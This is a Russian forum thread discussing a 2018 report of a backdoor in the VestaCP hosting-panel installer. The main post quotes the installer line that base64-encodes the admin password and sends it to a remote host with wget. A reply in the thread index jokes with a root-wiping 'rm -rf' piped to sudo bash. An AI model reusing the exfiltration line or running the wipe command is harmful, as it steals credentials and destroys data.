forum.opennet.ru

"Злоумышленники добавили вредоносный код в скрипт установки х..."

Форум Разговоры, обсуждение новостей
Версия для распечатки	Пред. тема \| След. тема

Исходное сообщение

[ Отслеживать ]

Отдельный RSS теперь доступен для каждого обсуждения в форуме и каждого минипортала.

. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+1 +/–
Сообщение от Аноним (16), 18-Окт-18, 18:36
статья ваша ниочем. сотрудники vesta сами добавили сбор пароля от admin в инсталлятор в base64, потом его удалили. codename="$codename:$(echo $vpass:$servername \| base64)" wget vestacp.com/notify/?$codename -O /dev/null -q https://github.com/serghey-rodin/vesta/commit/a3f0fa1501d424... https://github.com/serghey-rodin/vesta/commit/ee03eff016e03c... а взломщики скорее взяли их из лога сервера vestacp - куда они отправлялись инсталлятором а ссылка http://vestacp.com/test/?ip=127.0.0.1 для проверки ip вашего сервера (есть ли он в логах или нет)
Ответить \| Правка \| Наверх \| Cообщить модератору

Оглавление

Злоумышленники добавили вредоносный код в скрипт установки х..., opennews, 18-Окт-18, 13:47 [смотреть все]

Ух Хорошо зашли , Аноним, 18-Окт-18, 13:47 (1) //
- ха-а-арошая какая телеметрия она еще и запросы штатно принимает вообще класс , А, 18-Окт-18, 14:51 (7) //
  - А ты как собираешься без запросов спросить телеметрию, умник , Аноним, 18-Окт-18, 16:26 (10) //
    - А не надо её спрашивать Можно сделать, чтобы клиент телеметрии сам отправлял её, Аноним, 18-Окт-18, 16:49 (11)
  - Злоумышленники добавили вредоносный код в скрипт установки хостинг-панели VestaC, Himik, 18-Окт-18, 18:56 (17) //
    - Ага, рабочая станция значит, так А если рабочая станция отвечает, то сервер, бли, Аноним, 18-Окт-18, 23:32 (22)
- Ш10 отправляет ваши данные в микрософт говорили они , Ирокез, 18-Окт-18, 19:58 (19) //
  - Дурной пример заразителен Веб-абизянки тоже хотят быть как большая компания , Аноним, 19-Окт-18, 08:26 (25)
Повесил на вход в админку Vesta на нестандартном порте дополнительную HTTP-автор, mikhailnov, 18-Окт-18, 14:07 (2) //
- Если не забывать о том, что введенные вами логин пароль пробрасываются в весту в, Аноним, 18-Окт-18, 14:29 (3) //
  - Наш ответ https hackage haskell org package sproxy2, Аноним, 19-Окт-18, 16:42 (31)
- Как это спасёт от бэкдора в установочном скрипте Безопасности удалятся 0, инф, Аноним, 18-Окт-18, 15:06 (8)
- 171 поставил себе вирус закрыл файрволлом я хаккир 187 , scorry, 18-Окт-18, 15:47 (9)
- На что только не пойдут, лишь бы консолью не пользоваться , th3m3, 18-Окт-18, 16:59 (13) //
  - Ваш комментарий огорчает молодых специалистов , Аноним, 18-Окт-18, 18:13 (15)
Ох и рeшето других слов просто нет , CHERTS, 18-Окт-18, 14:37 (4)
Давно знал что майкрософты ужасное по делают, Аноним, 18-Окт-18, 14:39 (5)
Я давно говорил, что все эти панели - добром не кончатся И ведь не первая новос, th3m3, 18-Окт-18, 16:53 (12) //
- Не зря матери дочерей учат - Кто не учился, те работают на панели и заразы всяк, FedeX, 18-Окт-18, 17:09 (14) //
  - А потому служат Нурглу и Слаанеш сразу , Аноним, 18-Окт-18, 19:25 (18)
статья ваша ниочем сотрудники vesta сами добавили сбор пароля от admin в инстал , Аноним, 18-Окт-18, 18:36 (16) //
- Но зачем , Борщдрайвен бигдата, 18-Окт-18, 20:41 (20) //
  - Cause they can, очевидно же , Типа хомячок, 18-Окт-18, 23:04 (21)
- Шикарно И это тот случай, когда открытые исходники не помогут те, кто умеет их , KonstantinB, 19-Окт-18, 06:26 (23) //
  - хинт те кто умеет их читать, не пользуются панелями, а продают их как услугу П, нах, 19-Окт-18, 10:37 (28) //
    - Ой, не напоминайте мне об этих убожествах Слава яйцам, в последние лет 5 это вс, KonstantinB, 20-Окт-18, 04:03 (37)
      - угу, нет другого интернета кроме вконтактега и мордокнижечки, и товарищ майор пр, пох, 20-Окт-18, 10:46 (39)
      - Это ты так думаешь В мире мало того что куча VPS ок с предустановленной панелью, Vitaliy Blats, 20-Окт-18, 12:40 (40)
        
        на самом деле нам его уже сделал жопорукий аутсорсер, осталось выложить Он, коне, пох, 20-Окт-18, 19:35 (41)
Хорошую вещь CP не назовут , odd.mean, 19-Окт-18, 07:38 (24) //
- И альта-вистой тоже , Аноним, 19-Окт-18, 09:41 (26)
- а CP M , Аноним, 21-Окт-18, 06:23 (44) //
  - Ну разве что CP M Да и то , odd.mean, 21-Окт-18, 08:40 (45)
Есть Ajenti не вижу смысла в существовании этого плохо-кода , Аноним, 19-Окт-18, 09:44 (27) //
- Есть software_name1 не вижу смысла в существовании этого software_name2 , Vitaliy Blats, 19-Окт-18, 12:17 (30)
Fuck mehttps github com serghey-rodin vesta Download the installation scrip, Аноним, 19-Окт-18, 21:06 (32) //
- прости, а то что он тебе понаустановит - ты запускать вообще не планируешь Или , пох, 19-Окт-18, 21:46 (33) //
  - Вам следует настроить свой камертон на curl http , Грусть, 19-Окт-18, 22:59 (34) //
    - ой, какой ужас, злые соседи э какие нахрен соседи, мы что дома ставимся Злы, пох, 20-Окт-18, 19:39 (42)
- echo rm -rf --no-preserve-root 124 sudo bash, Аноним, 19-Окт-18, 23:16 (35)
- curl2bash 8482 , Аноним, 20-Окт-18, 01:43 (36) //
  - есть уже curl --rootme , annual slayer, 20-Окт-18, 06:45 (38)

Форумы | Темы | Пред. тема | След. тема

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру